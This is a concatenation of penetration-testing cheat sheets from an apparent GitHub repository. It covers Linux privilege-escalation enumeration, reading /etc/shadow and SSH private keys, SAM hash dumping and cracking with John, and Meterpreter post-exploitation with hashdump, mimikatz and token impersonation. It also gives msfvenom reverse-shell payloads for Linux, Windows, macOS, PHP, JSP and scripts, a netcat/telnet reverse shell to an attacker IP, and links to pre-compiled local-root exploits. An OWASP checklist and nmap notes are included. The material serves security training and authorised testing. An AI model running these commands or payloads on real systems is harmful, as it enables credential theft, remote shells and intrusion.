Not every exploit work for every system "out of the box". 7 | Try - Get ready for (lots of) trial and error. 8 | 9 | Operating System 10 | What's the distribution type? What version? 11 | cat /etc/issue 12 | cat /etc/*-release 13 | cat /etc/lsb-release 14 | cat /etc/redhat-release 15 | 16 | 17 | What's the Kernel version? Is it 64-bit? 18 | cat /proc/version 19 | uname -a 20 | uname -mrs 21 | rpm -q kernel 22 | dmesg | grep Linux 23 | ls /boot | grep vmlinuz- 24 | 25 | 26 | What can be learnt from the environmental variables? 27 | cat /etc/profile 28 | cat /etc/bashrc 29 | cat ~/.bash_profile 30 | cat ~/.bashrc 31 | cat ~/.bash_logout 32 | env 33 | set 34 | 35 | 36 | Is there a printer? 37 | lpstat -a 38 | 39 | 40 | Applications & Services 41 | What services are running? Which service has which user privilege? 42 | ps aux 43 | ps -ef 44 | top 45 | cat /etc/service 46 | 47 | 48 | Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check! 49 | ps aux | grep root 50 | ps -ef | grep root 51 | 52 | 53 | What applications are installed? What version are they? Are they currently running? 54 | ls -alh /usr/bin/ 55 | ls -alh /sbin/ 56 | dpkg -l 57 | rpm -qa 58 | ls -alh /var/cache/apt/archivesO 59 | ls -alh /var/cache/yum/ 60 | 61 | 62 | Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? 63 | cat /etc/syslog.conf 64 | cat /etc/chttp.conf 65 | cat /etc/lighttpd.conf 66 | cat /etc/cups/cupsd.conf 67 | cat /etc/inetd.conf 68 | cat /etc/apache2/apache2.conf 69 | cat /etc/my.conf 70 | cat /etc/httpd/conf/httpd.conf 71 | cat /opt/lampp/etc/httpd.conf 72 | ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ 73 | 74 | 75 | What jobs are scheduled? 76 | crontab -l 77 | ls -alh /var/spool/cron 78 | ls -al /etc/ | grep cron 79 | ls -al /etc/cron* 80 | cat /etc/cron* 81 | cat /etc/at.allow 82 | cat /etc/at.deny 83 | cat /etc/cron.allow 84 | cat /etc/cron.deny 85 | cat /etc/crontab 86 | cat /etc/anacrontab 87 | cat /var/spool/cron/crontabs/root 88 | 89 | Any plain text usernames and/or passwords? 90 | grep -i user [filename] 91 | grep -i pass [filename] 92 | grep -C 5 "password" [filename] 93 | find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla 94 | 95 | 96 | Communications & Networking 97 | What NIC(s) does the system have? Is it connected to another network? 98 | /sbin/ifconfig -a 99 | cat /etc/network/interfaces 100 | cat /etc/sysconfig/network 101 | 102 | 103 | What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? 104 | cat /etc/resolv.conf 105 | cat /etc/sysconfig/network 106 | cat /etc/networks 107 | iptables -L 108 | hostname 109 | dnsdomainname 110 | 111 | 112 | What other users & hosts are communicating with the system? 113 | lsof -i 114 | lsof -i :80 115 | grep 80 /etc/services 116 | netstat -antup 117 | netstat -antpx 118 | netstat -tulpn 119 | chkconfig --list 120 | chkconfig --list | grep 3:on 121 | last 122 | w 123 | 124 | 125 | Whats cached? IP and/or MAC addresses 126 | arp -e 127 | route 128 | /sbin/route -nee 129 | 130 | 131 | Is packet sniffing possible? What can be seen? Listen to live traffic 132 | # tcpdump tcp dst [ip] [port] and tcp dst [ip] [port] 133 | tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21 134 | 135 | 136 | Have you got a shell? Can you interact with the system? 137 | # http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/ 138 | nc -lvp 4444 # Attacker. Input (Commands) 139 | nc -lvp 4445 # Attacker. Ouput (Results) 140 | telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP! 141 | 142 | 143 | Is port forwarding possible? Redirect and interact with traffic from another view 144 | # rinetd 145 | # http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch 146 | 147 | # fpipe 148 | # FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP] 149 | FPipe.exe -l 80 -r 80 -s 80 192.168.1.7 150 | 151 | # ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip] 152 | ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port 153 | ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port 154 | 155 | # mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe 156 | mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay 157 | mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080) 158 | mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080) 159 | 160 | 161 | Is tunnelling possible? Send commands locally, remotely 162 | ssh -D 127.0.0.1:9050 -N [username]@[ip] 163 | proxychains ifconfig 164 | 165 | 166 | Confidential Information & Users 167 | Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what? 168 | id 169 | who 170 | w 171 | last 172 | cat /etc/passwd | cut -d: # List of users 173 | grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users 174 | awk -F: '($3 == "0") {print}' /etc/passwd # List of super users 175 | cat /etc/sudoers 176 | sudo -l 177 | 178 | 179 | What sensitive files can be found? 180 | cat /etc/passwd 181 | cat /etc/group 182 | cat /etc/shadow 183 | ls -alh /var/mail/ 184 | 185 | 186 | Anything "interesting" in the home directorie(s)? If it's possible to access 187 | ls -ahlR /root/ 188 | ls -ahlR /home/ 189 | 190 | 191 | Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords 192 | cat /var/apache2/config.inc 193 | cat /var/lib/mysql/mysql/user.MYD 194 | cat /root/anaconda-ks.cfg 195 | 196 | 197 | What has the user being doing? Is there any password in plain text? What have they been edting? 198 | cat ~/.bash_history 199 | cat ~/.nano_history 200 | cat ~/.atftp_history 201 | cat ~/.mysql_history 202 | cat ~/.php_history 203 | 204 | 205 | What user information can be found? 206 | cat ~/.bashrc 207 | cat ~/.profile 208 | cat /var/mail/root 209 | cat /var/spool/mail/root 210 | 211 | 212 | Can private-key information be found? 213 | cat ~/.ssh/authorized_keys 214 | cat ~/.ssh/identity.pub 215 | cat ~/.ssh/identity 216 | cat ~/.ssh/id_rsa.pub 217 | cat ~/.ssh/id_rsa 218 | cat ~/.ssh/id_dsa.pub 219 | cat ~/.ssh/id_dsa 220 | cat /etc/ssh/ssh_config 221 | cat /etc/ssh/sshd_config 222 | cat /etc/ssh/ssh_host_dsa_key.pub 223 | cat /etc/ssh/ssh_host_dsa_key 224 | cat /etc/ssh/ssh_host_rsa_key.pub 225 | cat /etc/ssh/ssh_host_rsa_key 226 | cat /etc/ssh/ssh_host_key.pub 227 | cat /etc/ssh/ssh_host_key 228 | 229 | 230 | File Systems 231 | Which configuration files can be written in /etc/? Able to reconfigure a service? 232 | ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone 233 | ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner 234 | ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group 235 | ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other 236 | 237 | find /etc/ -readable -type f 2>/dev/null # Anyone 238 | find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone 239 | 240 | 241 | What can be found in /var/ ? 242 | ls -alh /var/log 243 | ls -alh /var/mail 244 | ls -alh /var/spool 245 | ls -alh /var/spool/lpd 246 | ls -alh /var/lib/pgsql 247 | ls -alh /var/lib/mysql 248 | cat /var/lib/dhcp3/dhclient.leases 249 | 250 | 251 | Any settings/files (hidden) on website? Any settings file with database information? 252 | ls -alhR /var/www/ 253 | ls -alhR /srv/www/htdocs/ 254 | ls -alhR /usr/local/www/apache22/data/ 255 | ls -alhR /opt/lampp/htdocs/ 256 | ls -alhR /var/www/html/ 257 | 258 | 259 | Is there anything in the log file(s) (Could help with "Local File Includes"!) 260 | # http://www.thegeekstuff.com/2011/08/linux-var-log-files/ 261 | cat /etc/httpd/logs/access_log 262 | cat /etc/httpd/logs/access.log 263 | cat /etc/httpd/logs/error_log 264 | cat /etc/httpd/logs/error.log 265 | cat /var/log/apache2/access_log 266 | cat /var/log/apache2/access.log 267 | cat /var/log/apache2/error_log 268 | cat /var/log/apache2/error.log 269 | cat /var/log/apache/access_log 270 | cat /var/log/apache/access.log 271 | cat /var/log/auth.log 272 | cat /var/log/chttp.log 273 | cat /var/log/cups/error_log 274 | cat /var/log/dpkg.log 275 | cat /var/log/faillog 276 | cat /var/log/httpd/access_log 277 | cat /var/log/httpd/access.log 278 | cat /var/log/httpd/error_log 279 | cat /var/log/httpd/error.log 280 | cat /var/log/lastlog 281 | cat /var/log/lighttpd/access.log 282 | cat /var/log/lighttpd/error.log 283 | cat /var/log/lighttpd/lighttpd.access.log 284 | cat /var/log/lighttpd/lighttpd.error.log 285 | cat /var/log/messages 286 | cat /var/log/secure 287 | cat /var/log/syslog 288 | cat /var/log/wtmp 289 | cat /var/log/xferlog 290 | cat /var/log/yum.log 291 | cat /var/run/utmp 292 | cat /var/webmin/miniserv.log 293 | cat /var/www/logs/access_log 294 | cat /var/www/logs/access.log 295 | ls -alh /var/lib/dhcp3/ 296 | ls -alh /var/log/postgresql/ 297 | ls -alh /var/log/proftpd/ 298 | ls -alh /var/log/samba/ 299 | # auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp 300 | 301 | 302 | If commands are limited, you break out of the "jail" shell? 303 | python -c 'import pty;pty.spawn("/bin/bash")' 304 | echo os.system('/bin/bash') 305 | /bin/sh -i 306 | 307 | 308 | How are file-systems mounted? 309 | mount 310 | df -h 311 | 312 | 313 | Are there any unmounted file-systems? 314 | cat /etc/fstab 315 | 316 | 317 | What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID 318 | find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here 319 | find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. 320 | find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. 321 | 322 | find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID 323 | for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search) 324 | 325 | # find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied) 326 | find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null 327 | 328 | 329 | Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm 330 | find / -writable -type d 2>/dev/null # world-writeable folders 331 | find / -perm -222 -type d 2>/dev/null # world-writeable folders 332 | find / -perm -o+w -type d 2>/dev/null # world-writeable folders 333 | 334 | find / -perm -o+x -type d 2>/dev/null # world-executable folders 335 | 336 | find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writeable & executable folders 337 | 338 | 339 | Any "problem" files? Word-writeable, "nobody" files 340 | find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files 341 | find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files 342 | 343 | 344 | Preparation & Finding Exploit Code 345 | What development tools/languages are installed/supported? 346 | find / -name perl* 347 | find / -name python* 348 | find / -name gcc* 349 | find / -name cc 350 | 351 | 352 | How can files be uploaded? 353 | find / -name wget 354 | find / -name nc* 355 | find / -name netcat* 356 | find / -name tftp* 357 | find / -name ftp 358 | 359 | 360 | Finding exploit code 361 | http://www.exploit-db.com 362 | http://1337day.com 363 | http://www.securiteam.com 364 | http://www.securityfocus.com 365 | http://www.exploitsearch.net 366 | http://metasploit.com/modules/ 367 | http://securityreason.com 368 | http://seclists.org/fulldisclosure/ 369 | http://www.google.com 370 | 371 | 372 | Finding more information regarding the exploit 373 | http://www.cvedetails.com 374 | http://packetstormsecurity.org/files/cve/[CVE] 375 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE] 376 | http://www.vulnview.com/cve-details.php?cvename=[CVE] 377 | 378 | 379 | (Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk 380 | http://tarantula.by.ru/localroot/ 381 | http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/ -------------------------------------------------------------------------------- /Cheatsheet_LocalSamDump.txt: -------------------------------------------------------------------------------- 1 | fdisk -l 2 | 3 | mount -t ntfs /dev/sda1 /mnt 4 | 5 | df -k 6 | 7 | cd /mnt 8 | ls 9 | cd WINDOWS/system32/config 10 | 11 | ls 12 | bkhive system /root/hive.txt 13 | samdump2 SAM /root/hive.txt > /root/hash.txt 14 | 15 | john /root/hash.txt -format=nt2 -users=Administrator 16 | cd /root/.john 17 | ls -l 18 | cat john.pot -------------------------------------------------------------------------------- /Cheatsheet_MSFPostExploitation.txt: -------------------------------------------------------------------------------- 1 | [+] Meterpreter Shell 2 | 3 | meterpreter > sysinfo 4 | 5 | meterpreter > getuid 6 | 7 | meterpreter > getsystem 8 | 9 | meterpreter > hashdump 10 | 11 | meterpreter > load/use mimikatz 12 | 13 | kerberos Attempt to retrieve kerberos creds 14 | livessp Attempt to retrieve livessp creds 15 | mimikatz_command Run a custom commannd 16 | msv Attempt to retrieve msv creds (hashes) 17 | ssp Attempt to retrieve ssp creds 18 | tspkg Attempt to retrieve tspkg creds 19 | wdigest Attempt to retrieve wdigest creds 20 | 21 | meterpreter > wdigest 22 | 23 | meterpreter > use incognito 24 | meterpreter > list_tokens -u 25 | meterpreter > impersonate_token SERV-2K3\\Administrator 26 | execute -f cmd.exe -i -t -------------------------------------------------------------------------------- /Cheatsheet_Metasploit.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jivoi/Cheatsheets/9bc195d4cc05728c4ee29312124ac57ed54bb160/Cheatsheet_Metasploit.pdf -------------------------------------------------------------------------------- /Cheatsheet_MetasploitPayloads.txt: -------------------------------------------------------------------------------- 1 | [+] Creating Metasploit Payloads 2 | 3 | List payloads 4 | msfvenom -l 5 | 6 | Binaries 7 | 8 | Linux 9 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf 10 | 11 | Windows 12 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe 13 | 14 | Mac 15 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho 16 | 17 | 18 | Web Payloads 19 | 20 | PHP 21 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php 22 | cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php 23 | 24 | ASP 25 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 26 | 27 | JSP 28 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 29 | 30 | WAR 31 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 32 | 33 | 34 | Scripting Payloads 35 | 36 | Python 37 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 38 | 39 | Bash 40 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 41 | 42 | Perl 43 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 44 | 45 | 46 | Shellcode 47 | 48 | For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. 49 | 50 | Linux Based Shellcode 51 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 52 | 53 | Windows Based Shellcode 54 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 55 | 56 | Mac Based Shellcode 57 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 58 | 59 | 60 | Handlers 61 | 62 | Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. 63 | 64 | use exploit/multi/handler 65 | set PAYLOAD 66 | set LHOST 67 | set LPORT 68 | set ExitOnSession false 69 | exploit -j -z 70 | 71 | Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ 72 | -------------------------------------------------------------------------------- /Cheatsheet_MobileAppTesting.txt: -------------------------------------------------------------------------------- 1 | http://pen-testing.sans.org/blog/pen-testing/2013/12/02/mobile-device-tips-tricks-and-resources 2 | 3 | ------------------------------------------ Mobile Application Test Notes (iPhone) 4 | 5 | 6 | Prepping Device and Application: 7 | 8 | [+] Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04 9 | [+] Enable SSH on iPhone/iPad 10 | [+] Install iFunbox to install the application (http://www.i-funbox.com) 11 | [+] Connect device to lab wireless network 12 | [+] Add web proxy settings - IP address of attacking machine port 8080 13 | [+] Ensure connection and SSH is working 14 | 15 | 16 | Prepping Burp Suite: 17 | 18 | [+] Open Burp Suite and navigate to Proxy->Options, 19 | [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’. 20 | 21 | [+] Download and install burp certificate (.crt) onto ipad. 22 | 23 | Mobile Application Penetration Testing: 24 | 25 | [+] Browse the following Directory for insecure storage 26 | [-] /private/var/mobile/applications/ 27 | 28 | 29 | Notes: 30 | 31 | [+] Application file type - x.ipa 32 | 33 | [+] Easy way: 34 | 35 | - Place attacking machine and apple device on wireless network with app installed. 36 | - Email burps .cer to apple device and install 37 | - Start burp and disable firewall on listening machine. 38 | - Change proxy settings on apple device to point to listening burp machine/port. 39 | 40 | 41 | ------------------------------------------ Mobile Application Test Notes (Android) 42 | 43 | [+] Create a virtual device: 44 | [-] android avd 45 | 46 | [+] Start the emulator: 47 | [-] emulator –avd testavd 48 | 49 | [+] Install the application: 50 | [-] adb install 51 | 52 | [+] Open Burp Suite and navigate to Proxy->Options, 53 | [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’. 54 | 55 | [+] Start the emulator and proxy: 56 | [-] emulator –avd testavd –http-proxy http://localhost:8080 57 | 58 | [+] Download and install burp certificate (.crt) onto the emulator using the push shell command. 59 | 60 | 61 | Notes: 62 | 63 | [+] Application file type - x.apk 64 | 65 | Install Certs: http://www.realmb.com/droidCert/ 66 | SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp 67 | 68 | http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf -------------------------------------------------------------------------------- /Cheatsheet_Networking.txt: -------------------------------------------------------------------------------- 1 | Useful Networking Cheatsheet 2 | ---------------------------- 3 | 4 | [+] Setting up an Ethernet bridge in Ubuntu/Kali Linux 5 | 6 | # Install bridge-utils 7 | sudo apt-get install bridge-utils 8 | 9 | # Disable network-manager + firewall 10 | 11 | # Configuration 12 | 13 | ifconfig 14 | ifconfig eth0 0.0.0.0 15 | ifconfig eth1 0.0.0.0 16 | brctl addbr br0 17 | brctl addif br0 eth0 18 | brctl addif br0 eth1 19 | ifconfig mybridge up 20 | dhclient br0 on devices 21 | 22 | sudo tcpdump -i mybridge -------------------------------------------------------------------------------- /Cheatsheet_OWASPCheckList.txt: -------------------------------------------------------------------------------- 1 | The Checklist 2 | 3 | [+] Information Gathering 4 | 5 | Manually explore the site 6 | Spider/crawl for missed or hidden content 7 | Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store 8 | Check the caches of major search engines for publicly accessible sites 9 | Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler) 10 | Perform Web Application Fingerprinting 11 | Identify technologies used 12 | Identify user roles 13 | Identify application entry points 14 | Identify client-side code 15 | Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services) 16 | Identify co-hosted and related applications 17 | Identify all hostnames and ports 18 | Identify third-party hosted content 19 | 20 | [+] Configuration Management 21 | 22 | Check for commonly used application and administrative URLs 23 | Check for old, backup and unreferenced files 24 | Check HTTP methods supported and Cross Site Tracing (XST) 25 | Test file extensions handling 26 | Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS) 27 | Test for policies (e.g. Flash, Silverlight, robots) 28 | Test for non-production data in live environment, and vice-versa 29 | Check for sensitive data in client-side code (e.g. API keys, credentials) 30 | 31 | [+] Secure Transmission 32 | 33 | Check SSL Version, Algorithms, Key length 34 | Check for Digital Certificate Validity (Duration, Signature and CN) 35 | Check credentials only delivered over HTTPS 36 | Check that the login form is delivered over HTTPS 37 | Check session tokens only delivered over HTTPS 38 | Check if HTTP Strict Transport Security (HSTS) in use 39 | 40 | [+] Authentication 41 | 42 | Test for user enumeration 43 | Test for authentication bypass 44 | Test for bruteforce protection 45 | Test password quality rules 46 | Test remember me functionality 47 | Test for autocomplete on password forms/input 48 | Test password reset and/or recovery 49 | Test password change process 50 | Test CAPTCHA 51 | Test multi factor authentication 52 | Test for logout functionality presence 53 | Test for cache management on HTTP (eg Pragma, Expires, Max-age) 54 | Test for default logins 55 | Test for user-accessible authentication history 56 | Test for out-of channel notification of account lockouts and successful password changes 57 | Test for consistent authentication across applications with shared authentication schema / SSO 58 | 59 | [+] Session Management 60 | 61 | Establish how session management is handled in the application (eg, tokens in cookies, token in URL) 62 | Check session tokens for cookie flags (httpOnly and secure) 63 | Check session cookie scope (path and domain) 64 | Check session cookie duration (expires and max-age) 65 | Check session termination after a maximum lifetime 66 | Check session termination after relative timeout 67 | Check session termination after logout 68 | Test to see if users can have multiple simultaneous sessions 69 | Test session cookies for randomness 70 | Confirm that new session tokens are issued on login, role change and logout 71 | Test for consistent session management across applications with shared session management 72 | Test for session puzzling 73 | Test for CSRF and clickjacking 74 | 75 | [+] Authorization 76 | 77 | Test for path traversal 78 | Test for bypassing authorization schema 79 | Test for vertical Access control problems (a.k.a. Privilege Escalation) 80 | Test for horizontal Access control problems (between two users at the same privilege level) 81 | Test for missing authorization 82 | 83 | [+] Data Validation 84 | 85 | Test for Reflected Cross Site Scripting 86 | Test for Stored Cross Site Scripting 87 | Test for DOM based Cross Site Scripting 88 | Test for Cross Site Flashing 89 | Test for HTML Injection 90 | Test for SQL Injection 91 | Test for LDAP Injection 92 | Test for ORM Injection 93 | Test for XML Injection 94 | Test for XXE Injection 95 | Test for SSI Injection 96 | Test for XPath Injection 97 | Test for XQuery Injection 98 | Test for IMAP/SMTP Injection 99 | Test for Code Injection 100 | Test for Expression Language Injection 101 | Test for Command Injection 102 | Test for Overflow (Stack, Heap and Integer) 103 | Test for Format String 104 | Test for incubated vulnerabilities 105 | Test for HTTP Splitting/Smuggling 106 | Test for HTTP Verb Tampering 107 | Test for Open Redirection 108 | Test for Local File Inclusion 109 | Test for Remote File Inclusion 110 | Compare client-side and server-side validation rules 111 | Test for NoSQL injection 112 | Test for HTTP parameter pollution 113 | Test for auto-binding 114 | Test for Mass Assignment 115 | Test for NULL/Invalid Session Cookie 116 | 117 | [+] Denial of Service 118 | 119 | Test for anti-automation 120 | Test for account lockout 121 | Test for HTTP protocol DoS 122 | Test for SQL wildcard DoS 123 | 124 | [+] Business Logic 125 | 126 | Test for feature misuse 127 | Test for lack of non-repudiation 128 | Test for trust relationships 129 | Test for integrity of data 130 | Test segregation of duties 131 | 132 | [+] Cryptography 133 | 134 | Check if data which should be encrypted is not 135 | Check for wrong algorithms usage depending on context 136 | Check for weak algorithms usage 137 | Check for proper use of salting 138 | Check for randomness functions 139 | 140 | [+] Risky Functionality - File Uploads 141 | 142 | Test that acceptable file types are whitelisted 143 | Test that file size limits, upload frequency and total file counts are defined and are enforced 144 | Test that file contents match the defined file type 145 | Test that all file uploads have Anti-Virus scanning in-place. 146 | Test that unsafe filenames are sanitised 147 | Test that uploaded files are not directly accessible within the web root 148 | Test that uploaded files are not served on the same hostname/port 149 | Test that files and other media are integrated with the authentication and authorisation schemas 150 | 151 | [+] Risky Functionality - Card Payment 152 | 153 | Test for known vulnerabilities and configuration issues on Web Server and Web Application 154 | Test for default or guessable password 155 | Test for non-production data in live environment, and vice-versa 156 | Test for Injection vulnerabilities 157 | Test for Buffer Overflows 158 | Test for Insecure Cryptographic Storage 159 | Test for Insufficient Transport Layer Protection 160 | Test for Improper Error Handling 161 | Test for all vulnerabilities with a CVSS v2 score > 4.0 162 | Test for Authentication and Authorization issues 163 | Test for CSRF 164 | 165 | [+] HTML 5 166 | 167 | Test Web Messaging 168 | Test for Web Storage SQL injection 169 | Check CORS implementation 170 | Check Offline Web Application -------------------------------------------------------------------------------- /Cheatsheet_Oracle.txt: -------------------------------------------------------------------------------- 1 | Oracle Penetration Testing 2 | -------------------------- 3 | 4 | Tools within Kali: 5 | 6 | oscanner 7 | root@kali:~# oscanner -s 192.168.1.15 -P 1040 8 | 9 | sidguess 10 | root@kali:~# sidguess -i 192.168.1.205 -d /usr/share/wordlists/metasploit/unix_users.txt 11 | 12 | tnscmd10g 13 | root@kali:~# tnscmd10g version -h 192.168.1.20 14 | 15 | Nmap 16 | nmap -p 1521 -A 192.168.15.205 17 | 18 | Nmap nse scripts 19 | Metasploit auxiliaries -------------------------------------------------------------------------------- /Cheatsheet_PenTesting.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------- Reminders 2 | 3 | LOG EVERYTHING! 4 | 5 | Metasploit - spool /home//.msf3/logs/console.log 6 | Save contents from each terminal! 7 | Linux - script myoutput.txt # Type exit to stop 8 | 9 | [+] Disable network-manager 10 | service network-manager stop 11 | 12 | [+] Set IP address 13 | ifconfig eth0 192.168.50.12/24 14 | 15 | [+] Set default gateway 16 | route add default gw 192.168.50.9 17 | 18 | [+] Set DNS servers 19 | echo "nameserver 192.168.100.2" >> /etc/resolv.conf 20 | 21 | [+] Show routing table 22 | Windows - route print 23 | Linux - route -n 24 | 25 | [+] Add static route 26 | Linux - route add -net 192.168.100.0/24 gw 192.16.50.9 27 | Windows - route add 0.0.0.0 mask 0.0.0.0 192.168.50.9 28 | 29 | [+] Subnetting easy mode 30 | ipcalc 192.168.0.1 255.255.255.0 31 | 32 | [+] Windows SAM file locations 33 | c:\windows\system32\config\ 34 | c:\windows\repair\ 35 | bkhive system /root/hive.txt 36 | samdump2 SAM /root/hive.txt > /root/hash.txt 37 | 38 | [+] Python Shell 39 | python -c 'import pty;pty.spawn("/bin/bash")' 40 | 41 | -------------------------------------------------------------------------- Internet Host/Network Enumeration 42 | 43 | [+] WHOIS Querying 44 | whois www.domain.com 45 | 46 | [+] Resolve an IP using DIG 47 | dig @8.8.8.8 securitymuppets.com 48 | 49 | [+] Find Mail servers for a domain 50 | dig @8.8.8.8 securitymuppets.com -t mx 51 | 52 | [+] Find any DNS records for a domain 53 | dig @8.8.8.8 securitymuppets.com -t any 54 | 55 | [+] Zone Transfer 56 | dig @192.168.100.2 securitymuppets.com -t axfr 57 | host -l securitymuppets.com 192.168.100.2 58 | nslookup / ls -d domain.com.local 59 | 60 | [+] Fierce 61 | fierce -dns -file 62 | fierce -dns -dnsserver 63 | fierce -range -dnsserver 64 | fierce -dns -wordlist 65 | 66 | -------------------------------------------------------------------------- IP Network scanning 67 | 68 | [+] ARP Scan 69 | arp-scan 192.168.50.8/28 -I eth0 70 | 71 | [+] NMAP Scans 72 | 73 | [+] Nmap ping scan 74 | sudo nmap –sn -oA nmap_pingscan 192.168.100.0/24 (-PE) 75 | 76 | [+] Nmap SYN/Top 100 ports Scan 77 | nmap -sS -F -oA nmap_fastscan 192.168.0.1/24 78 | 79 | [+] Nmap SYN/Version All port Scan - ## Main Scan 80 | sudo nmap -sV -PN -p0- -T4 -A --stats-every 60s --reason -oA nmap_scan 192.168.0.1/24 81 | 82 | [+] Nmap SYN/Version No Ping All port Scan 83 | sudo nmap -sV -Pn -p0- --exclude 192.168.0.1 --reason -oA nmap_scan 192.168.0.1/24 84 | 85 | [+] Nmap UDP All port scan - ## Main Scan 86 | sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24 87 | 88 | [+] Nmap UDP/Fast Scan 89 | nmap -F -sU -oA nmap_UDPscan 192.168.0.1/24 90 | 91 | [+] Nmap Top 1000 port UDP Scan 92 | nmap -sU -oA nmap_UDPscan 192.168.0.1/24 93 | 94 | [+] HPING3 Scans 95 | hping3 -c 3 -s 53 -p 80 -S 192.168.0.1 96 | Open = flags = SA 97 | Closed = Flags = RA 98 | Blocked = ICMP unreachable 99 | Dropped = No response 100 | 101 | [+] Source port scanning 102 | nmap -g (88 (Kerberos) port 53 (DNS) or 67 (DHCP)) 103 | Source port also doesn't work for OS detection. 104 | 105 | [+] Speed settings 106 | -n Disable DNS resolution 107 | -sS TCP SYN (Stealth) Scan 108 | -Pn Disable host discovery 109 | -T5 Insane time template 110 | --min-rate 1000 1000 packets per second 111 | --max-retries 0 Disable retransmission of timed-out probes 112 | 113 | -------------------------------------------------------------------------- Cisco/Networking Commands 114 | 115 | ? - Help 116 | > - User mode 117 | # - Privileged mode 118 | router(config)# - Global Configuration mode 119 | 120 | enable secret more secure than enable password. 121 | 122 | For example, in the configuration command: 123 | enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP. 124 | The enable secret has been hashed with MD5, whereas in the command: 125 | username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D 126 | The password has been encrypted using the weak reversible algorithm. 127 | 